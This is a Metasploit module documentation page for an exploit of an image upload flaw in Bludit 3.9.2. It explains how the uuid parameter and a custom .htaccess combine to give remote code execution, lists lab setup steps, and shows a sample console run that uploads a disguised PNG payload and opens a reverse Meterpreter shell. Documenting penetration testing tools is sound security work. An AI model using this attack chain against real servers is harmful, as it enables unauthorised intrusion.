adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c70043f84286ed1eff7da2fef5dd7f2122b81663
metasploit-gs/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md
T
Wei Chen 717a31c7c3 Fix typos and format
2019-11-11 14:47:56 -06:00

1.4 KiB
Raw Blame History

Bludit Directory Traversal Image File Upload Vulnerability

Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by christasa in the image uploading feature. A remote user could abuse the uuid parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check, and finally get remote code execution.

Setup

  1. Set up a Ubuntu box with Apache, PHP, and MySQL.
  2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
  3. Follow the installation guide here. Make sure your Apache server sets AllowOverride All in /etc/apache2/apache2.conf.

Scenarios

msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
Reference in New Issue View Git Blame Copy Permalink